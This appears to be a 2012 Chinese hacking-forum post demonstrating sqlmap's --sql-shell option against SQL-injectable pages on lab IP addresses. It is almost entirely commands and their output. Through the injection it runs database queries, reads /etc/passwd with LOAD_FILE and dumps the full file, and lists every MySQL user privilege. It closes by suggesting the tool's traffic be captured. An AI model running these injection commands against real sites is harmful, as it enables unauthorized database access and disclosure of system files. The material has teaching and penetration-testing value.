切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
279 SQLMAP SQL SHELL[复制链接]
发表于 2012-9-29 00:14:18 | 显示全部楼层 |!read_mode!
–sql-shell ,通过注入点执行一些数据库语句
  1. root@Dis9Team:~# sqlmap -u http://5.5.5.3/get.asp?id=1 --sql-shell
  2. sql-shell> sp_configure
  3. [21:52:56] [INFO] fetching SQL query output: 'sp_configure '
  4. [21:52:56] [INFO] resumed: None
  5. sp_configure :    'None'
  6. sql-shell> select convert(varchar(30),login_time,120) from master..sysprocesses where spid=1
  7. [21:53:04] [INFO] fetching SQL SELECT statement query output: 'select convert(varchar(30),login_time,120) from master..sysprocesses where spid=1 '
  8. [21:53:04] [INFO] retrieved: 2012-09-10 12:26:59
  9. select convert(varchar(30),login_time,120) from master..sysprocesses where spid=1 :    '2012-09-10 12:26:59'
  10. sql-shell>
复制代码
对于MYSQL也一样
  1. root@Dis9Team:~# sqlmap -u http://5.5.5.8/pen/news.php?id=1 --sql-shell
  2. sql-shell> SELECT LOAD_FILE('/etc/passwd')
  3. [21:55:13] [INFO] fetching SQL SELECT statement query output: 'SELECT LOAD_FILE('/etc/passwd')'
  4. SELECT LOAD_FILE('/etc/passwd'):    'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\nbin:x:2:2:bin:/bin:/bin/sh\nsys:x:3:3:sys:/dev:/bin/sh\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/bin/sh\nman:x:6:12:man:/var/cache/man:/bin/sh\nlp:x:7:7:lp:/var/spool/lpd:/bin/sh\nmail:x:8:8:mail:/var/mail:/bin/sh\nnews:x:9:9:news:/var/spool/news:/bin/sh\nuucp:x:10:10:uucp:/var/spool/uucp:/bin/sh\nproxy:x:13:13:proxy:/bin:/bin/sh\nwww-data:x:33:33:www-data:/var/www:/bin/sh\nbackup:x:34:34:backup:/var/backups:/bin/sh\nlist:x:38:38:Mailing List Manager:/var/list:/bin/sh\nirc:x:39:39:ircd:/var/run/ircd:/bin/sh\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh\nnobody:x:65534:65534:nobody:/nonexistent:/bin/sh\nlibuuid:x:100:101::/var/lib/libuuid:/bin/sh\nsyslog:x:101:103::/home/syslog:/bin/false\nmessagebus:x:102:105::/var/run/dbus:/bin/false\navahi-autoipd:x:103:108:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false\navahi:x:104:109:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false\nusbmux:x:105:46:usbmux daemon,,,:/home/usbmux:/bin/false\ngdm:x:106:114:Gnome Display Manager:/var/lib/gdm:/bin/false\nspeech-dispatcher:x:107:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh\nkernoops:x:108:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false\npulse:x:109:116:PulseAudio daemon,,,:/var/run/pulse:/bin/false\nrtkit:x:110:119:RealtimeKit,,,:/proc:/bin/false\nhplip:x:111:7:HPLIP system user,,,:/var/run/hplip:/bin/false\nsaned:x:112:121::/home/saned:/bin/false\nbrk:x:1000:1000:Dis9Team,,,:/home/brk:/bin/bash\npostgres:x:113:123:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash\nsmmta:x:114:124:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false\nsmmsp:x:115:125:Mail Submission Program,,,:/var/lib/sendmail:/bin/false\nvboxadd:x:999:1::/var/run/vboxadd:/bin/false\nsshd:x:116:65534::/var/run/sshd:/usr/sbin/nologin\nmysql:x:1001:110::/home/mysql:/bin/false\n'
  5. sql-shell> SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privileges
  6. [21:57:06] [INFO] fetching SQL SELECT statement query output: 'SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privileges'
  7. SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privileges [108]:
  8. [*] 'root'@'localhost', SELECT, YES
  9. [*] 'root'@'localhost', INSERT, YES
  10. [*] 'root'@'localhost', UPDATE, YES
  11. [*] 'root'@'localhost', DELETE, YES
  12. [*] 'root'@'localhost', CREATE, YES
  13. [*] 'root'@'localhost', DROP, YES
  14. [*] 'root'@'localhost', RELOAD, YES
  15. [*] 'root'@'localhost', SHUTDOWN, YES
  16. [*] 'root'@'localhost', PROCESS, YES
  17. [*] 'root'@'localhost', FILE, YES
  18. [*] 'root'@'localhost', REFERENCES, YES
  19. [*] 'root'@'localhost', INDEX, YES
  20. [*] 'root'@'localhost', ALTER, YES
  21. [*] 'root'@'localhost', SHOW DATABASES, YES
  22. [*] 'root'@'localhost', SUPER, YES
  23. [*] 'root'@'localhost', CREATE TEMPORARY TABLES, YES
  24. [*] 'root'@'localhost', LOCK TABLES, YES
  25. [*] 'root'@'localhost', EXECUTE, YES
  26. [*] 'root'@'localhost', REPLICATION SLAVE, YES
  27. [*] 'root'@'localhost', REPLICATION CLIENT, YES
  28. [*] 'root'@'localhost', CREATE VIEW, YES
  29. [*] 'root'@'localhost', SHOW VIEW, YES
  30. [*] 'root'@'localhost', CREATE ROUTINE, YES
  31. [*] 'root'@'localhost', ALTER ROUTINE, YES
  32. [*] 'root'@'localhost', CREATE USER, YES
  33. [*] 'root'@'localhost', EVENT, YES
  34. [*] 'root'@'localhost', TRIGGER, YES
  35. [*] 'root'@'ubuntu', SELECT, YES
  36. [*] 'root'@'ubuntu', INSERT, YES
  37. [*] 'root'@'ubuntu', UPDATE, YES
  38. [*] 'root'@'ubuntu', DELETE, YES
  39. [*] 'root'@'ubuntu', CREATE, YES
  40. [*] 'root'@'ubuntu', DROP, YES
  41. [*] 'root'@'ubuntu', RELOAD, YES
  42. [*] 'root'@'ubuntu', SHUTDOWN, YES
  43. [*] 'root'@'ubuntu', PROCESS, YES
  44. [*] 'root'@'ubuntu', FILE, YES
  45. [*] 'root'@'ubuntu', REFERENCES, YES
  46. [*] 'root'@'ubuntu', INDEX, YES
  47. [*] 'root'@'ubuntu', ALTER, YES
  48. [*] 'root'@'ubuntu', SHOW DATABASES, YES
  49. [*] 'root'@'ubuntu', SUPER, YES
  50. [*] 'root'@'ubuntu', CREATE TEMPORARY TABLES, YES
  51. [*] 'root'@'ubuntu', LOCK TABLES, YES
  52. [*] 'root'@'ubuntu', EXECUTE, YES
  53. [*] 'root'@'ubuntu', REPLICATION SLAVE, YES
  54. [*] 'root'@'ubuntu', REPLICATION CLIENT, YES
  55. [*] 'root'@'ubuntu', CREATE VIEW, YES
  56. [*] 'root'@'ubuntu', SHOW VIEW, YES
  57. [*] 'root'@'ubuntu', CREATE ROUTINE, YES
  58. [*] 'root'@'ubuntu', ALTER ROUTINE, YES
  59. [*] 'root'@'ubuntu', CREATE USER, YES
  60. [*] 'root'@'ubuntu', EVENT, YES
  61. [*] 'root'@'ubuntu', TRIGGER, YES
  62. [*] 'root'@'127.0.0.1', SELECT, YES
  63. [*] 'root'@'127.0.0.1', INSERT, YES
  64. [*] 'root'@'127.0.0.1', UPDATE, YES
  65. [*] 'root'@'127.0.0.1', DELETE, YES
  66. [*] 'root'@'127.0.0.1', CREATE, YES
  67. [*] 'root'@'127.0.0.1', DROP, YES
  68. [*] 'root'@'127.0.0.1', RELOAD, YES
  69. [*] 'root'@'127.0.0.1', SHUTDOWN, YES
  70. [*] 'root'@'127.0.0.1', PROCESS, YES
  71. [*] 'root'@'127.0.0.1', FILE, YES
  72. [*] 'root'@'127.0.0.1', REFERENCES, YES
  73. [*] 'root'@'127.0.0.1', INDEX, YES
  74. [*] 'root'@'127.0.0.1', ALTER, YES
  75. [*] 'root'@'127.0.0.1', SHOW DATABASES, YES
  76. [*] 'root'@'127.0.0.1', SUPER, YES
  77. [*] 'root'@'127.0.0.1', CREATE TEMPORARY TABLES, YES
  78. [*] 'root'@'127.0.0.1', LOCK TABLES, YES
  79. [*] 'root'@'127.0.0.1', EXECUTE, YES
  80. [*] 'root'@'127.0.0.1', REPLICATION SLAVE, YES
  81. [*] 'root'@'127.0.0.1', REPLICATION CLIENT, YES
  82. [*] 'root'@'127.0.0.1', CREATE VIEW, YES
  83. [*] 'root'@'127.0.0.1', SHOW VIEW, YES
  84. [*] 'root'@'127.0.0.1', CREATE ROUTINE, YES
  85. [*] 'root'@'127.0.0.1', ALTER ROUTINE, YES
  86. [*] 'root'@'127.0.0.1', CREATE USER, YES
  87. [*] 'root'@'127.0.0.1', EVENT, YES
  88. [*] 'root'@'127.0.0.1', TRIGGER, YES
  89. [*] 'debian-sys-maint'@'localhost', SELECT, YES
  90. [*] 'debian-sys-maint'@'localhost', INSERT, YES
  91. [*] 'debian-sys-maint'@'localhost', UPDATE, YES
  92. [*] 'debian-sys-maint'@'localhost', DELETE, YES
  93. [*] 'debian-sys-maint'@'localhost', CREATE, YES
  94. [*] 'debian-sys-maint'@'localhost', DROP, YES
  95. [*] 'debian-sys-maint'@'localhost', RELOAD, YES
  96. [*] 'debian-sys-maint'@'localhost', SHUTDOWN, YES
  97. [*] 'debian-sys-maint'@'localhost', PROCESS, YES
  98. [*] 'debian-sys-maint'@'localhost', FILE, YES
  99. [*] 'debian-sys-maint'@'localhost', REFERENCES, YES
  100. [*] 'debian-sys-maint'@'localhost', INDEX, YES
  101. [*] 'debian-sys-maint'@'localhost', ALTER, YES
  102. [*] 'debian-sys-maint'@'localhost', SHOW DATABASES, YES
  103. [*] 'debian-sys-maint'@'localhost', SUPER, YES
  104. [*] 'debian-sys-maint'@'localhost', CREATE TEMPORARY TABLES, YES
  105. [*] 'debian-sys-maint'@'localhost', LOCK TABLES, YES
  106. [*] 'debian-sys-maint'@'localhost', EXECUTE, YES
  107. [*] 'debian-sys-maint'@'localhost', REPLICATION SLAVE, YES
  108. [*] 'debian-sys-maint'@'localhost', REPLICATION CLIENT, YES
  109. [*] 'debian-sys-maint'@'localhost', CREATE VIEW, YES
  110. [*] 'debian-sys-maint'@'localhost', SHOW VIEW, YES
  111. [*] 'debian-sys-maint'@'localhost', CREATE ROUTINE, YES
  112. [*] 'debian-sys-maint'@'localhost', ALTER ROUTINE, YES
  113. [*] 'debian-sys-maint'@'localhost', CREATE USER, YES
  114. [*] 'debian-sys-maint'@'localhost', EVENT, YES
  115. [*] 'debian-sys-maint'@'localhost', TRIGGER, YES

  116. sql-shell>
复制代码

建议用BS抓下他的包 有惊喜
如:
http://3g-sec.com/sqlmap/279/mysql.txt

操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-2 03:10

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部